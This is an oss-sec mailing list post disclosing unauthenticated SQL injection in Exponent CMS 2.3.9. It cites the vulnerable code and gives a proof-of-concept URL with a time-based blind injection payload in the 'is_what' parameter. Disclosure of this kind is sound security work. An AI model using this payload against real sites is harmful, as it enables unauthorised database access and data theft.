oss-sec mailing list archives
Exponent CMS 2.3.9 SQL injection vulnerabilities
From: east wu <ylgaaaaa () gmail com>
Date: Mon, 19 Sep 2016 13:46:34 +0800
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/ addressbook/controllers/addressController.php#L172 'is_what' parameter there is an injection without login https://github.com/exponentcms/exponent-cms/blob/master/framework/core/subsystems/expDatabase.php#L559 $this->sql("UPDATE " . $this->prefix . $table . " SET " . $col . "=0 WHERE " . $where); POC: /index.php?controller=address&action=activate_address&is_what=address1=(select * from (select sleep(5))x)%23&id=1
Current thread:
- Exponent CMS 2.3.9 SQL injection vulnerabilities east wu (Sep 19)
- <Possible follow-ups>
- Exponent CMS 2.3.9 SQL injection vulnerabilities 王禹哲 (Sep 19)